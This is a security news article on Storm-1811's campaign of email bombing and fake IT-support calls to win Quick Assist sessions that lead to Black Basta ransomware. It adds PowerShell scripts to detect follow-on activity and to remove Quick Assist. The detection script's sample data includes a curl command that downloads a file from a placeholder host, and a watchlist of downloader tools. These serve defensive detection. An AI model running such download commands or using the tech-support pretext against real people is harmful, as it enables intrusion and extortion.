Fraudsters Leveraging Quick Assist Feature for Ransomware Attacks

Black Basta Ransomware Attack

Cybercriminals with a monetary incentive use Windows Quick Assist in social engineering schemes to infect victims’ networks with Black Basta ransomware payloads.

Microsoft has been tracking this campaign since at least mid-April 2024. Based on its observations, the threat group, which it tracks as Storm-1811, begins by email bombing the target: it signs the target's address up to several email subscription services so that the inbox fills with subscription mail.

Microsoft stated in a May 15, 2024 report, “Storm-1811 is a financially motivated cybercriminal group known to deploy Black Basta ransomware.”

The attack chain starts with voice phishing: the caller impersonates IT or support staff to talk the victim into accepting a Quick Assist session or installing remote monitoring and management (RMM) software, and that access is then used to deliver Qakbot, Cobalt Strike, and finally Black Basta ransomware.

Threat actors misuse Quick Assist features to perform social engineering attacks by pretending, for example, to be a trusted contact like Microsoft technical support or an IT professional from the target user’s company to gain initial access to a target device.

– The tech giant stated.

What is Quick Assist?

Quick Assist is a legitimate Microsoft application that lets a user share their Windows or macOS device with another person over a remote connection so that person can troubleshoot it. On Windows 11 devices it is preinstalled.

Because a Quick Assist session gives the helper a view of the device and, once the user approves the request, full control of it, the same feature works just as well for an attacker who persuades the user to accept a session.

That is what makes the tech-support pretext so effective: the fraudster needs no exploit. The victim enters the session code the caller provides and approves the request for control, and the attacker has an interactive session on the workstation.

The threat actors use link listing attacks, a form of email bombing, to make the later call credible. They sign the targeted addresses up to multiple legitimate email subscription services so the inbox floods with subscription content, after which a call from “IT” about the sudden flood of mail seems plausible.

Misusing Legitimate Windows Applications

According to a blog post by Microsoft Threat Intelligence, once the attackers have won the user's trust and obtained remote access, Storm-1811 uses the session to deliver malware to the device.

The end goal is to deploy Black Basta ransomware for financial gain. From the victim's side, the sequence is an inbox suddenly full of subscription email, followed by a phone call from someone posing as IT or support staff.
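The chain described above (a Quick Assist session, then an RMM client or a downloader launched shortly afterwards) is something a defender can look for in process-creation telemetry. The following PowerShell is an added example, not a query from Microsoft's report or from the author of this article. The events are constructed to look like Sysmon event 1 or Defender DeviceProcessEvents rows, and the watchlist of follow-on binaries and the 60-minute window are assumptions to tune for your own environment.

```powershell
# Added example: flag hosts where quickassist.exe ran and a watchlisted RMM client
# or downloader started within the following window. Sample events are constructed.

$rmmWatchlist  = @('screenconnect.clientservice.exe', 'client32.exe', 'curl.exe', 'bitsadmin.exe')  # assumption: tune per environment
$windowMinutes = 60                                                                                   # assumption

# Constructed sample of process-creation events (Host, User, Image, CommandLine, Time)
$events = @(
    [pscustomobject]@{ Time = [datetime]'2024-05-15T10:02:00'; Host = 'WS-104'; User = 'jdoe';   Image = 'C:\Windows\System32\quickassist.exe';      CommandLine = 'quickassist.exe' },
    [pscustomobject]@{ Time = [datetime]'2024-05-15T10:14:00'; Host = 'WS-104'; User = 'jdoe';   Image = 'C:\Windows\System32\curl.exe';             CommandLine = 'curl.exe -o C:\Users\jdoe\Downloads\update.zip hxxp://example.invalid/update.zip' },
    [pscustomobject]@{ Time = [datetime]'2024-05-15T10:16:00'; Host = 'WS-104'; User = 'jdoe';   Image = 'C:\ProgramData\NetSupport\client32.exe';   CommandLine = 'client32.exe' },
    [pscustomobject]@{ Time = [datetime]'2024-05-15T11:40:00'; Host = 'WS-221'; User = 'asmith'; Image = 'C:\Windows\System32\quickassist.exe';      CommandLine = 'quickassist.exe' },
    [pscustomobject]@{ Time = [datetime]'2024-05-15T15:00:00'; Host = 'WS-221'; User = 'asmith'; Image = 'C:\Windows\System32\notepad.exe';          CommandLine = 'notepad.exe' }
)

function Find-QuickAssistFollowOn {
    param([object[]]$Events, [string[]]$Watchlist, [int]$WindowMinutes)

    # Correlate per host: every Quick Assist start is checked against later events on the same machine
    foreach ($group in ($Events | Group-Object Host)) {
        $sorted   = $group.Group | Sort-Object Time
        $sessions = $sorted | Where-Object { [IO.Path]::GetFileName($_.Image) -ieq 'quickassist.exe' }

        foreach ($qa in $sessions) {
            $deadline = $qa.Time.AddMinutes($WindowMinutes)
            $followOn = $sorted | Where-Object {
                $_.Time -gt $qa.Time -and $_.Time -le $deadline -and
                ($Watchlist -contains ([IO.Path]::GetFileName($_.Image).ToLower()))
            }
            if ($followOn) {
                [pscustomobject]@{
                    Host             = $group.Name
                    User             = $qa.User
                    QuickAssistStart = $qa.Time
                    FollowOn         = ($followOn | ForEach-Object { "$($_.Time.ToString('HH:mm')) $([IO.Path]::GetFileName($_.Image))" }) -join '; '
                }
            }
        }
    }
}

# On the constructed sample this reports WS-104 (curl.exe and client32.exe after Quick Assist);
# WS-221 is not reported because only notepad.exe followed, and outside the window.
Find-QuickAssistFollowOn -Events $events -Watchlist $rmmWatchlist -WindowMinutes $windowMinutes | Format-Table -AutoSize
```

In production you would feed the function real events (for example from `Get-WinEvent` on the Sysmon operational log, or an export from your EDR) rather than the constructed array. `curl.exe` is on the watchlist because it is a common first-stage downloader in hands-on-keyboard sessions, but it is noisy on developer machines; the correlation with a preceding Quick Assist start is what keeps the alert useful.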

According to security experts, the attacks show how easily threat actors can misuse legitimate remote-access capabilities to deceive and compromise individuals, especially when they are skilled at social engineering and can get a victim to act on a false pretext.

Cybercriminals turn to advanced social engineering attacks whenever they are unable to compromise weak credentials or use basic phishing emails to breach an organization.

~ According to Darren Guccione, the CEO and co-founder of Keeper Security, in an email to Dark Reading

He added that the growing sophistication of these attacks, and their use of remote-access tools in particular, underscores the need for continual staff training on how to recognize such tactics as they evolve.

The Ransom Technique – Black Basta

Black Basta is believed to be one of several groups that emerged when the Conti cybercrime gang shut down two years ago following a string of embarrassing data breaches.

Black Basta first surfaced as a ransomware-as-a-service (RaaS) operation in April 2022.

The American Dental Association, the Toronto Public Library, the German defense contractor Rheinmetall, the United Kingdom’s technology outsourcing company Capita, the industrial automation company and government contractor ABB, Sobeys, Knauf, and Yellow Pages Canada are just a few of the well-known victims that its affiliates have breached since then.

More recently, a ransomware attack on the large American healthcare provider Ascension, which forced it to divert ambulances to unaffected facilities, was linked to Black Basta.

Research from cyber insurance provider Corvus Insurance and cybersecurity company Elliptic suggests that, as of November 2023, Black Basta has received at least $100 million in ransom payments from more than 90 victims.

How to Minimize Quick Assist Attacks?

Organizations are advised to train staff to recognize fake tech-support approaches, and to block or uninstall Quick Assist and other remote monitoring and management tools wherever they are not in use.

Microsoft and outside experts both stress that this is a simple, low-cost step. Once a corporate user voluntarily hands an attacker remote control of a workstation, the organization's other defenses are largely bypassed, so removing the tool where it has no business purpose closes that avenue before the phone call ever happens.
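As an added example of that advice in practice (this is not a script from Microsoft's report or from the article's author), the following PowerShell removes Quick Assist from a Windows 10/11 host where it is not needed. Quick Assist ships either as a Windows capability on older builds or as a Store app on newer Windows 11 builds, so both forms are handled. The capability and package names are the ones Microsoft uses at the time of writing; verify them on your own build before rolling this out at scale.

```powershell
# Added example: inventory and remove Quick Assist on a host where it has no business use.
# Run in an elevated session. Names below are assumptions to verify on your build.

# 1. Capability form (Windows 10 and early Windows 11)
$cap = Get-WindowsCapability -Online | Where-Object Name -like 'App.Support.QuickAssist*'
if ($cap -and $cap.State -eq 'Installed') {
    Remove-WindowsCapability -Online -Name $cap.Name | Out-Null
    Write-Host "Removed capability $($cap.Name)"
}

# 2. Store-app form (package family MicrosoftCorporationII.QuickAssist):
#    remove it for all existing users, then deprovision it so new profiles do not get it back.
Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist' -ErrorAction SilentlyContinue |
    Remove-AppxPackage -AllUsers
Get-AppxProvisionedPackage -Online |
    Where-Object DisplayName -eq 'MicrosoftCorporationII.QuickAssist' |
    Remove-AppxProvisionedPackage -Online | Out-Null

# 3. Verify that neither form is left behind
$left = @(
    Get-WindowsCapability -Online | Where-Object { $_.Name -like 'App.Support.QuickAssist*' -and $_.State -eq 'Installed' }
    Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist' -ErrorAction SilentlyContinue
)
if ($left.Count -eq 0) {
    Write-Host 'Quick Assist is not installed on this host'
} else {
    Write-Warning 'Quick Assist is still present; check the names above against this build'
}
```

Two caveats. Removal is not durable on its own where the Store can reinstall the app, so pair it with an application control rule (AppLocker or WDAC) that denies quickassist.exe for standard users. And removing Quick Assist does nothing about the other RMM tools the caller may ask the victim to install, which is why the training part of the advice is not optional.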

Within a zero-trust architecture, an organization can also deploy a privileged access management (PAM) system that “prevents unauthorized privilege escalation and ensures that user access roles are strongly enforced,” according to Guccione.

Although Guccione noted that “anyone” can fall for vishing and other social engineering attacks, Microsoft and other experts recommend consistent, up-to-date employee training so that staff can spot these approaches; that awareness is often what stops the compromise at the phone call.

Janki Mehta

Janki Mehta is a passionate Cyber-Security Enthusiast who keenly monitors the latest developments in the Web/Cyber Security industry. She puts her knowledge into practice and helps web users by arming them with the necessary security measures to stay safe in the digital world.